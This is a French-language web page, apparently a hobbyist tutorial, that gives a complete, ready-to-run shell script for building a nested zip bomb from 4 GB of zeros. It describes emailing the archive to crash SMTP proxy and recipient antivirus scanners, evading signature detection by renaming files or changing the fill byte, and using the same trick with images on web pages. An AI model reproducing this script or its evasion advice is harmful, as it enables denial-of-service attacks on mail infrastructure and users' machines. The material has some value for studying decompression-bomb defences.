4Go de zéros ->compressés->fermion9.dll |
4Go de zéros ->compressés->fermiona.dll |
4Go de zéros ->compressés->fermionb.dll |
4Go de zéros ->compressés->fermionc.dll |
4Go de zéros ->compressés->fermiond.dll |
4Go de zéros ->compressés->fermione.dll |
4Go de zéros ->compressés->fermionf.dll –

--> compressé --> atome(0 à f).zip --> compressés --> molecule(0 à f).zip --> compressés --> adn(0 à f).zip --> compressés
--> surprise_inside.zip

voici le petit script qui permet de concevoir une tel merveille. Pour l’exécuter il faut bien sur être sous linux il faut que les exécutables gzip, zip, dd, et awk soient présents sinon installer les paquetages correspondants. Il faut bien sur donner le droit en exécution au script et un dernier petit conseil il faut être sur une partition ext2 ou 3, car j’ai fait l’essai sur une partition dos et le résultat ne faisait plus 53Ko mais 400 ko, ceci est sûrement du à la gestion des clusters de FAT. Il faut peu d’espace disque pour l’exécuter car les 4G0 sont crées à la volée et non sur le disque donc la taille minimum de libre pour pouvoir l’exécuter doit être de 16 x 4Mo (64Mo taille des fichiers de la première occurrence).

#!/bin/sh
clear
echo "création du fichier référence"
dd if=/dev/zero bs=1M count=4096 2>/dev/null | gzip -9 >fermion0.dll
echo "copie de ce fichier 15 fois"
i=1
while [ $i -le 9 ]
do
cp fermion0.dll fermion`echo -e "x$((30+$i))"`.dll
i=$(($i+1))
done
while [ $i -le 15 ]
do
cp fermion0.dll fermion`echo -e "x$((51+$i))"`.dll
i=$(($i+1))
done
echo "taille de chaque fichier fermion?.dll : `ls -alh fermion0.dll|awk '{print }'`"
echo
echo "création de la première occurence"
zip -R9 quark0.zip '*.dll' 1>/dev/null
rm -f *.dll
echo "copie de ce fichier 15 fois"
i=1
while [ $i -le 9 ]
do
cp quark0.zip quark`echo -e "x$((30+$i))"`.zip
i=$(($i+1))
done
while [ $i -le 15 ]
do
cp quark0.zip quark`echo -e "x$((51+$i))"`.zip
i=$(($i+1))
done
echo "taille de chaque fichier quark?.zip : `ls -alh quark0.zip|awk '{print }'`"
echo
echo "création de la deuxième occurence"
zip -R9 proton0.zip 'quark?.zip' 1>/dev/null
rm -f quark*.zip
echo "copie de ce fichier 15 fois"
i=1
while [ $i -le 9 ]
do
cp proton0.zip proton`echo -e "x$((30+$i))"`.zip
i=$(($i+1))
done
while [ $i -le 15 ]
do
cp proton0.zip proton`echo -e "x$((51+$i))"`.zip
i=$(($i+1))
done
echo "taille de chaque fichier proton?.zip : `ls -alh proton0.zip|awk '{print }'`"
echo
echo "création de la troisième occurence"
zip -R9 atome0.zip 'proton?.zip' 1>/dev/null
rm -f proton*.zip
echo "copie de ce fichier 15 fois"
i=1
while [ $i -le 9 ]
do
cp atome0.zip atome`echo -e "x$((30+$i))"`.zip
i=$(($i+1))
done
while [ $i -le 15 ]
do
cp atome0.zip atome`echo -e "x$((51+$i))"`.zip
i=$(($i+1))
done
echo "taille de chaque fichier atome?.zip : `ls -alh atome0.zip|awk '{print }'`"
echo
echo "création de la quatrième occurence"
zip -R9 molecule0.zip 'atome?.zip' 1>/dev/null
rm -f atome*.zip
echo "copie de ce fichier 15 fois"
i=1
while [ $i -le 9 ]
do
cp molecule0.zip molecule`echo -e "x$((30+$i))"`.zip
i=$(($i+1))
done
while [ $i -le 15 ]
do
cp molecule0.zip molecule`echo -e "x$((51+$i))"`.zip
i=$(($i+1))
done
echo "taille de chaque fichier molecule?.zip : `ls -alh molecule0.zip|awk '{print }'`"
echo
echo "création de la cinquième occurence"
zip -R9 adn0.zip 'molecule?.zip' 1>/dev/null
rm -f molecule*.zip
echo "copie de ce fichier 15 fois"
i=1
while [ $i -le 9 ]
do
cp adn0.zip adn`echo -e "x$((30+$i))"`.zip
i=$(($i+1))
done
while [ $i -le 15 ]
do
cp adn0.zip adn`echo -e "x$((51+$i))"`.zip
i=$(($i+1))
done
echo "taille de chaque fichier adn?.zip : `ls -alh adn0.zip|awk '{print }'`"
echo
echo "création du fichier final"
zip -R9 surprise_inside.zip 'adn?.zip' 1>/dev/null
rm -f adn*.zip
echo "taille du fichier surprise_inside.zip : `ls -alh surprise_inside.zip|awk '{print }'`"
echo


Ce genre de fichier est souvent envoyé en pièce jointe dans un mail dans le but de faire planter l’antivirus du proxy smtp, ceci dit si il arrive jusqu’à son correpondant il y a de fortes chances pour que ce soit carrément l’antivirus de celui-ci.

Certains antivirus peuvent détecter ce genre de bombe, enfin c’est le cas de Kaspersky je crois mais le principale problème c’est qu’il l’identifie sur la base d’une signature donc il suffit de changer le nom de fichiers ou de remplacer les 0 par un autre caractère pour qu’il ne les détecte plus. La solution serais d’analyser la taille possible de chacune des occurrences avant de les décompresser mais il faut croire que les éditeurs d’antivirus sont trop bêtes pour s’en rendre compte.

Je vous conseil de le mettre dans un espace que votre antivirus n’ira pas analyser si vous voulez éviter d’avoir votre disque saturé. et si vous vous l’envoyez par mail évitez d’activer l’analyse de mail en temps réel. Le fait de changer l’extension de fichier ne change pas grand-chose ; norton c’est fait baisé car il a vu que son contenu était un zip il a quand même voulu le dézipper pour analyse (ctrl-alt-suppr est mon ami).

Petit détail pour finir l’exemple que j’ai fait n’est qu’un exemple il existe d’autres types de fichiers ou l’on peut utiliser cette technique, cela peut être des image (gif png) ce qui sous entend que l’on peut se faire avoir en surfant sur un site ou ce type d’image est présent dans un page.
Pour connaître un tableau récapitulant les antivirus qui détectent ce genre de fichiers et les programmes plus ou moins vulnérables consultez cette page.         ICI


Evitez de faire trop joujou avec ce genre de fichier cela pourrait se retourner contre vous
Salutation...

Haut de la page